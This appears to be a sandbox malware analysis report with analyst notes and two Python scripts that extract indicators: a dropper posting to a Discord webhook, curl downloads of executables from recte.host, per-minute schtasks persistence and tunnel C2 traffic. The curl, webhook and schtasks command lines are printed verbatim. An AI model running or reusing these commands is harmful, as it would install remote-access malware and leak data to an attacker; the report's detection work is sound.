"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.5.2100969568\646837057" -childID 4 -isForBrowser -prefsHandle 4936 -prefMapHandle 4952 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1160 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {9342e130-22af-4a3a-bed5-febb351a7134} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 4932 27d63b6ab58 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.6.1878075749\761246163" -childID 5 -isForBrowser -prefsHandle 4960 -prefMapHandle 4956 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1160 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {10aa32d8-ed96-4486-bb96-3497cbc43854} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 2808 27d7d925558 tab
C:\Program Files\Mozilla Firefox\firefox.exe
"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="5212.7.794327305\550752595" -childID 6 -isForBrowser -prefsHandle 5204 -prefMapHandle 5208 -prefsLen 26125 -prefMapSize 233444 -jsInitHandle 1160 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d7499bac-cd39-45d3-b2c8-8affa8bd7530} 5212 "\\.\pipe\gecko-crash-server-pipe.5212" 5292 27d7d926158 tab
C:\Users\Admin\AppData\Roaming\yar.exe
C:\Users\Admin\AppData\Roaming\yar.exe
C:\Users\Admin\AppData\Local\penisware.exe
C:\Users\Admin\AppData\Local\penisware.exe
C:\Users\Admin\AppData\Roaming\svvhost.exe
C:\Users\Admin\AppData\Roaming\svvhost.exe
C:\Users\Admin\AppData\Roaming\yar.exe
C:\Users\Admin\AppData\Roaming\yar.exe
C:\Users\Admin\AppData\Local\penisware.exe
C:\Users\Admin\AppData\Local\penisware.exe
C:\Users\Admin\AppData\Roaming\svvhost.exe
C:\Users\Admin\AppData\Roaming\svvhost.exe
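From VM_Dropper.exe onward the child command lines follow one pattern: a curl POST to a Discord webhook (with `Referer`/`Origin` headers imitating discohook.org), seven curl downloads from recte.host into C:\Users\Admin, each file executed as soon as it lands, then schtasks entries that re-run copies from AppData every minute at the highest run level, repeated from the SYSTEM profile path. The script below is an added example, not the report's own tooling, that pulls those indicators out of a list of command lines. CMDLINES is a constructed sample copied from the process list above: only the curl.exe and schtasks.exe children are included (not their cmd.exe /c wrappers, so each action appears once) and the webhook body is shortened to its first field.

```python
import ntpath
import re

# Constructed sample: command lines copied from the behavioral process list,
# curl.exe and schtasks.exe children only, webhook body shortened.
CMDLINES = [
    r'curl "https://discord.com/api/webhooks/1239677728240832532/RFIoqPa0RsA3ISZRB7mropzgu-w8H3HuWhnGN1Nqe_5NlnvP2SuBf7hFvNWch7r5TDhv" -X POST -H "Referer: https://discohook.org/" -H "Content-Type: application/json" --data-raw "{""content"":""`Admin` Ran The File!""}"',
    r'curl https://recte.host/xworm/yar.exe --output C:\Users\Admin\yar.exe',
    r'curl https://recte.host/venom/scchost.exe --output C:\Users\Admin\sachost.exe',
    r'curl https://recte.host/xworm/penisware.exe --output C:\Users\Admin\penisware.exe',
    r'curl https://recte.host/venom/penisware2.exe --output C:\Users\Admin\penisballs.exe',
    r'curl https://recte.host/xworm/physics.exe --output C:\Users\Admin\physics.exe',
    r'curl https://recte.host/venom/calc.exe --output C:\Users\Admin\calc.exe',
    r'curl https://recte.host/r77/Install.exe --output C:\Users\Admin\install.exe',
    r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "yar" /tr "C:\Users\Admin\AppData\Roaming\yar.exe"',
    r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "penisware" /tr "C:\Users\Admin\AppData\Local\penisware.exe"',
    r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svvhost" /tr "C:\Users\Admin\AppData\Roaming\svvhost.exe"',
    r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "yar" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\yar.exe"',
    r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "penisware" /tr "C:\Windows\system32\config\systemprofile\AppData\Local\penisware.exe"',
    r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "svvhost" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\svvhost.exe"',
]

DOWNLOAD_RE = re.compile(r'\bcurl\s+"?(https?://[^\s"]+)"?\s+--output\s+"?([^\s"]+)')
WEBHOOK_RE = re.compile(r'https://discord\.com/api/webhooks/(\d+)/')
TASK_RE = re.compile(r'schtasks(\.exe)?"?\s+/create', re.I)
SYSTEM_PROFILE = r'c:\windows\system32\config\systemprofile'  # the SYSTEM account's profile

def _flag(cmd, name):
    """Value of a schtasks /name argument, quoted or bare; None if absent."""
    m = re.search(r'/%s\s+(?:"([^"]*)"|(\S+))' % name, cmd, re.I)
    if not m:
        return None
    return m.group(1) if m.group(1) is not None else m.group(2)

def downloads(cmds):
    """(url, local path) pairs from curl --output lines, deduplicated in order."""
    seen = []
    for c in cmds:
        m = DOWNLOAD_RE.search(c)
        if m and m.groups() not in seen:
            seen.append(m.groups())
    return seen

def downloaded_names(cmds):
    return [ntpath.basename(path) for _, path in downloads(cmds)]

def url_families(cmds):
    """First path segment of each download URL: the hosting folder names, unique."""
    fams = []
    for url, _ in downloads(cmds):
        seg = url.split("/", 3)[3].split("/")[0]
        if seg not in fams:
            fams.append(seg)
    return fams

def webhook_ids(cmds):
    ids = []
    for c in cmds:
        for wid in WEBHOOK_RE.findall(c):
            if wid not in ids:
                ids.append(wid)
    return ids

def tasks(cmds):
    """One record per schtasks /create line."""
    out = []
    for c in cmds:
        if not TASK_RE.search(c):
            continue
        target = _flag(c, "tr") or ""
        out.append({"name": _flag(c, "tn"), "target": target,
                    "schedule": f"{_flag(c, 'sc')}/{_flag(c, 'mo')}",
                    "runlevel": (_flag(c, "RL") or "").upper(),
                    "system_profile": target.lower().startswith(SYSTEM_PROFILE)})
    return out

def relocated(cmds):
    """Downloaded basenames that a task later runs from a different directory."""
    dl = {ntpath.basename(p).lower(): ntpath.dirname(p).lower() for _, p in downloads(cmds)}
    moved = set()
    for t in tasks(cmds):
        base = ntpath.basename(t["target"]).lower()
        if base in dl and ntpath.dirname(t["target"]).lower() != dl[base]:
            moved.add(base)
    return moved

def triage(cmds):
    ts = tasks(cmds)
    return {"webhooks": webhook_ids(cmds),
            "downloads": downloads(cmds),
            "families": url_families(cmds),
            "relocated": sorted(relocated(cmds)),
            "every_minute_highest": sorted({t["name"] for t in ts
                                            if t["schedule"] == "minute/1" and t["runlevel"] == "HIGHEST"}),
            "system_profile_tasks": sorted({t["name"] for t in ts if t["system_profile"]})}

if __name__ == "__main__":
    for key, value in triage(CMDLINES).items():
        print(f"{key}: {value}")
```

Two findings fall out directly. `relocated` shows that yar.exe and penisware.exe were downloaded into C:\Users\Admin but are scheduled from AppData\Roaming and AppData\Local, so the payloads copied themselves before registering persistence; svvhost.exe was never downloaded under that name, so it is a renamed or dropped copy. The `system_profile_tasks` entries point at C:\Windows\system32\config\systemprofile, which is the profile of the SYSTEM account, so the same task set was registered a second time from a SYSTEM context. The folder names under recte.host (`xworm`, `venom`, `r77`) are the operator's own labels and only the XWorm one is confirmed by the report's detection; treat the others as unverified.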
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 183.142.211.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.238.32.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | discord.com | udp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.128.159.162.in-addr.arpa | udp |
| US | 8.8.8.8:53 | recte.host | udp |
| US | 104.21.23.17:443 | recte.host | tcp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.23.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 104.21.23.17:443 | recte.host | tcp |
| US | 104.21.23.17:443 | recte.host | tcp |
| US | 104.21.23.17:443 | recte.host | tcp |
| US | 104.21.23.17:443 | recte.host | tcp |
| US | 147.185.221.19:25944 | | tcp |
| US | 147.185.221.19:42571 | | tcp |
| US | 8.8.8.8:53 | 19.221.185.147.in-addr.arpa | udp |
| US | 147.185.221.19:38630 | | tcp |
| US | 104.21.23.17:443 | recte.host | tcp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 104.21.23.17:443 | recte.host | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | teen-modes.gl.at.ply.gg | udp |
| US | 147.185.221.19:23638 | teen-modes.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | politics-fiber.gl.at.ply.gg | udp |
| US | 147.185.221.19:47430 | politics-fiber.gl.at.ply.gg | tcp |
| US | 13.107.253.67:443 | | tcp |
| US | 147.185.221.19:25944 | politics-fiber.gl.at.ply.gg | tcp |
| US | 147.185.221.19:42571 | politics-fiber.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | politics-fiber.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | san-periods.gl.at.ply.gg | udp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:23638 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:42571 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:42571 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | content-signature-2.cdn.mozilla.net | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | shavar.services.mozilla.com | udp |
| US | 34.160.144.191:443 | content-signature-2.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | push.services.mozilla.com | udp |
| US | 44.237.98.207:443 | shavar.services.mozilla.com | tcp |
| US | 8.8.8.8:53 | contile.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | shavar.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | prod.content-signature-chains.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | autopush.prod.mozaws.net | udp |
| US | 8.8.8.8:53 | 166.188.117.34.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.98.237.44.in-addr.arpa | udp |
| US | 8.8.8.8:53 | firefox.settings.services.mozilla.com | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 34.117.188.166:443 | contile.services.mozilla.com | udp |
| US | 34.107.243.93:443 | autopush.prod.mozaws.net | tcp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 73.239.69.13.in-addr.arpa | udp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| US | 8.8.8.8:53 | chromewebstore.googleapis.com | udp |
| GB | 172.217.169.42:443 | chromewebstore.googleapis.com | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | aus5.mozilla.org | udp |
| US | 35.244.181.201:443 | aus5.mozilla.org | tcp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | prod.balrog.prod.cloudops.mozgcp.net | udp |
| US | 8.8.8.8:53 | 201.181.244.35.in-addr.arpa | udp |
| US | 34.149.100.209:443 | prod.remote-settings.prod.webservices.mozgcp.net | tcp |
| US | 34.160.144.191:443 | prod.content-signature-chains.prod.webservices.mozgcp.net | tcp |
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| FR | 23.200.87.12:80 | ciscobinary.openh264.org | tcp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | a19.dscg10.akamai.net | udp |
| US | 8.8.8.8:53 | 12.87.200.23.in-addr.arpa | udp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| GB | 142.250.187.206:443 | redirector.gvt1.com | tcp |
| US | 8.8.8.8:53 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | 206.187.250.142.in-addr.arpa | udp |
| GB | 142.250.187.206:443 | redirector.gvt1.com | udp |
| US | 8.8.8.8:53 | r4---sn-aigl6ney.gvt1.com | udp |
| US | 8.8.8.8:53 | r4.sn-aigl6ney.gvt1.com | udp |
| GB | 173.194.183.169:443 | r4.sn-aigl6ney.gvt1.com | tcp |
| US | 8.8.8.8:53 | r4.sn-aigl6ney.gvt1.com | udp |
| GB | 173.194.183.169:443 | r4.sn-aigl6ney.gvt1.com | udp |
| US | 8.8.8.8:53 | 169.183.194.173.in-addr.arpa | udp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | firefox-settings-attachments.cdn.mozilla.net | udp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 8.8.8.8:53 | attachments.prod.remote-settings.prod.webservices.mozgcp.net | udp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
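Reading this slice of the network table: the Mozilla, OpenH264, gvt1.com and akamai.net rows are the analysis VM's own Firefox doing first-run work (remote settings, the OpenH264 and Widevine plugin downloads that also show up in the Files section), and the 8.8.8.8:53 rows are resolver lookups. The only traffic left is the repeated TCP connections to 147.185.221.19 on ports 38630, 25944, 45994 and 47430 via san-periods.gl.at.ply.gg; ply.gg is the playit.gg tunnelling service, so the host-and-port pairs are the useful indicators, while the bare IP is shared infrastructure and weak on its own. The script below is an added example, not the sandbox's own logic: it parses rows in the table layout above (SAMPLE_ROWS is constructed from a subset of the report's rows), drops the VM noise using suffix lists that are this example's assumptions, and emits the candidate C2 with its ports and hit count.

```python
"""Triage a sandbox report's network table: separate the analysis VM's own
browser traffic from candidate C2 and emit IOCs. Added example, not the
sandbox's logic; SAMPLE_ROWS is constructed from a subset of the report's
rows, and the suffix lists are this example's assumptions."""
import re
from collections import defaultdict

# Constructed sample in the report's pipe-table layout (country, dst, host, proto).
SAMPLE_ROWS = """\
| US | 8.8.8.8:53 | ciscobinary.openh264.org | udp |
| FR | 23.200.87.12:80 | ciscobinary.openh264.org | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
| GB | 142.250.187.206:443 | redirector.gvt1.com | tcp |
| US | 34.117.121.53:443 | firefox-settings-attachments.cdn.mozilla.net | tcp |
| US | 147.185.221.19:25944 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:45994 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:47430 | san-periods.gl.at.ply.gg | tcp |
| US | 147.185.221.19:38630 | san-periods.gl.at.ply.gg | tcp |
"""

# Assumption: hosts the sandbox's Firefox/Windows contact on first run (remote
# settings, OpenH264 and Widevine plugin downloads, reverse-DNS lookups).
BENIGN_SUFFIXES = (".mozgcp.net", ".mozilla.net", ".gvt1.com", ".akamai.net",
                   ".openh264.org", ".in-addr.arpa")
# Assumption: free tunnelling services whose hostnames are routinely used as
# C2 rendezvous points; ply.gg belongs to playit.gg.
TUNNEL_SUFFIXES = (".ply.gg",)

ROW_RE = re.compile(
    r"^\|\s*([A-Z]{2})\s*\|\s*([\d.]+):(\d+)\s*\|\s*(\S+)\s*\|\s*(tcp|udp)\s*\|$")


def parse_rows(text):
    """Parse pipe-table rows into dicts; lines that do not match are skipped."""
    rows = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            cc, ip, port, host, proto = m.groups()
            rows.append({"cc": cc, "ip": ip, "port": int(port),
                         "host": host.lower(), "proto": proto})
    return rows


def classify(row):
    """dns: resolver lookup; tunnel: tunnelling-service endpoint;
    noise: browser/OS housekeeping; unknown: anything else worth a look."""
    if row["ip"] == "8.8.8.8" and row["port"] == 53:
        return "dns"
    if row["host"].endswith(TUNNEL_SUFFIXES):
        return "tunnel"
    if row["host"].endswith(BENIGN_SUFFIXES):
        return "noise"
    return "unknown"


def extract_iocs(text):
    """Candidate C2 keyed by IP: hostnames seen, destination ports, hit count.
    Tunnel endpoints are shared infrastructure, so the host+port pairs are the
    useful indicators; the bare IP is weak on its own."""
    iocs = defaultdict(lambda: {"hosts": set(), "ports": set(), "hits": 0})
    for row in parse_rows(text):
        if classify(row) in ("tunnel", "unknown"):
            entry = iocs[row["ip"]]
            entry["hosts"].add(row["host"])
            entry["ports"].add(row["port"])
            entry["hits"] += 1
    return dict(iocs)


if __name__ == "__main__":
    for ip, info in extract_iocs(SAMPLE_ROWS).items():
        print(ip, sorted(info["hosts"]), sorted(info["ports"]), info["hits"])
```

Anything that falls into "unknown" rather than "noise" should be reviewed by hand before the allow-list is extended; the point of the suffix list is to keep the VM's own traffic out of a blocklist, not to declare everything else hostile.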
Files
memory/4284-0-0x0000000074ADE000-0x0000000074ADF000-memory.dmp
memory/4284-1-0x0000000000440000-0x0000000000466000-memory.dmp
C:\Users\Admin\yar.exe
| MD5 | 9e8baf127b832943d4fae218ce90191a |
| SHA1 | 449e6f1c2c79cb0ee4d43151bcaa6ecfd38efa70 |
| SHA256 | fbbb58d64ed3d52ebf0c4442588f4a19e48fd64023188fb750926b13c40df8a0 |
| SHA512 | 9af9e3e30c34ecad41277c0bb8e27eabaf7fa05249153ffac20262af4ed3680a5a85cc5c192b04b3da3835396ef68e4e4a8b9123c663d8cf2f3a8681db7f8114 |
memory/5040-5-0x00007FFFD63F3000-0x00007FFFD63F5000-memory.dmp
memory/5040-6-0x0000000000990000-0x00000000009C8000-memory.dmp
memory/5040-7-0x0000000002B20000-0x0000000002B26000-memory.dmp
C:\Users\Admin\sachost.exe
| MD5 | 7a9290dfef391b53b114a8ddea1a7675 |
| SHA1 | b6a0047be861becb45d8868beffafb1216f6243a |
| SHA256 | 33b848f9b1ea8ec2f27da181512df79d9e65e2e8c814f1df29945d19d60708dc |
| SHA512 | 9a7f349698014256e950a81f42b9c9b20d25312a7310e914f9cebc553e872d23f1d14d802c656cde4867f93e1621e999f3a283ce01263fa567f2e41a36185d49 |
memory/4632-11-0x0000000000DE0000-0x0000000000E26000-memory.dmp
memory/4632-12-0x00000000015C0000-0x00000000015C6000-memory.dmp
C:\Users\Admin\penisware.exe
| MD5 | 69d8b4e23e8772c8509e2f2d96d13d1e |
| SHA1 | c29c85bd8c58b6b9aa3266763b3c5358d402d6ba |
| SHA256 | c8bd8c0e90372507183037207e67c54129f7eec6a3596ff26cf13cee98dd865b |
| SHA512 | 7a5e39123f08c2bf521dbb31bd4c1ddb1a94d7dba26c31138ca071dc6d589dcf960e9e5cd691723703ab9939cf1abe73ef33b201019c8140d339ee7bcb1b4e6c |
memory/2276-17-0x0000000000DC0000-0x0000000000DF6000-memory.dmp
memory/2276-18-0x0000000002E50000-0x0000000002E56000-memory.dmp
C:\Users\Admin\penisballs.exe
| MD5 | 18f497deffe88b6b2cff336a277aface |
| SHA1 | 4e1413241d3d3e4dbff399d179f8fd64f3ecd39e |
| SHA256 | 8133c3c1e5dde7c9b4d9d5c9a07e37b733fd0223fc9d035c3f386f034a434af5 |
| SHA512 | 35c804ec73001fe66d57bd2fadc51cd399edbc2e550c4257f29aac5a24a9f9c030c582d50239dec41605801263fd5739444aa14f9683f99f726152cc1bb6920d |
memory/5108-22-0x0000000000690000-0x00000000006D6000-memory.dmp
memory/5108-23-0x0000000002740000-0x0000000002746000-memory.dmp
C:\Users\Admin\AppData\Roaming\MyData\DataLogs.conf
| MD5 | cf759e4c5f14fe3eec41b87ed756cea8 |
| SHA1 | c27c796bb3c2fac929359563676f4ba1ffada1f5 |
| SHA256 | c9f9f193409217f73cc976ad078c6f8bf65d3aabcf5fad3e5a47536d47aa6761 |
| SHA512 | c7f832aee13a5eb36d145f35d4464374a9e12fa2017f3c2257442d67483b35a55eccae7f7729243350125b37033e075efbc2303839fd86b81b9b4dca3626953b |
C:\Users\Admin\physics.exe
| MD5 | 7849154210d0e788d25f4f195438c765 |
| SHA1 | 93018c5de438c48a4d890071352b60b81952fe17 |
| SHA256 | 8ba1d2d467e3d78a65a238e592a81d6a518737bc077e39dd162cffc76ee18441 |
| SHA512 | bdc70b6615c794c222eb8f5004f0ed5a78062c282f8938556b514bf77bab79724a3a6a621672ba2d97fbbf1567bdc249ab6adb918ae5f2945e45b5d32f85a1d2 |
memory/3880-28-0x0000000000A20000-0x0000000000A66000-memory.dmp
memory/3880-29-0x0000000001210000-0x0000000001216000-memory.dmp
C:\Users\Admin\calc.exe
| MD5 | 8cc75bff0675c5c55483b206666b9dd3 |
| SHA1 | 218198bfd494e31db303e55d41c110564835f0e3 |
| SHA256 | 1a7b62006c6db37c873401724d0303fc789f2422bc7c1878f6dd5379f340d607 |
| SHA512 | 0a6930caacdbf2003b29a12b0e8db682223800f285b1b8428cf29d00439d7ab7299d96dde9ae12e2121be1f6b4bb10a7a1477e759457ef7c85650784cc911879 |
memory/4136-37-0x0000000000590000-0x00000000005A0000-memory.dmp
C:\Users\Admin\install.exe
| MD5 | 1a7d1b5d24ba30c4d3d5502295ab5e89 |
| SHA1 | 2d5e69cf335605ba0a61f0bbecbea6fc06a42563 |
| SHA256 | b2cc4454c0a4fc80b1fc782c45ac7f76b1d95913d259090a2523819aeec88eb5 |
| SHA512 | 859180338958509934d22dbc9be9da896118739d87727eb68744713259e819551f7534440c545185f469da03c86d96e425cdf5aae3fb027bb8b7f51044e08eaa |
C:\Windows\Temp\__PSScriptPolicyTest_f3o103k1.q4v.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
